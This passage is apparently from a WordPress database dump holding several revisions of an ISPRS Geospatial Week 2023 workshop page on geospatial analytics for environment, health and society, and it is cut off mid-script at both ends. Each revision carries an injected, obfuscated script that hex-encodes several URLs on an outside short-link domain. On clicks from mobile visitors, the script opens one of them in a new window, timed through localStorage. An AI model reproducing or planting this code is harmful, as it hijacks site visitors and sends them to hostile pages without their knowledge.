_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:14:51','2022-12-07 04:14:51','',3427,'https://gsw2023.com/?p=3440',0,'revision','',0),
(3441,1,'2022-12-07 04:15:54','2022-12-07 04:15:54','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><u>Themes of the Workshop</u></strong></p>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p><strong><u>Scientific Committee:</u></strong></p>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:15:54','2022-12-07 04:15:54','',3427,'https://gsw2023.com/?p=3441',0,'revision','',0),
(3442,1,'2022-12-07 04:16:02','2022-12-07 04:16:02','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><u>Themes of the Workshop</u></strong></p>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p><strong><u>Scientific Committee:</u></strong></p>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li>Weilian Li<strong>, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\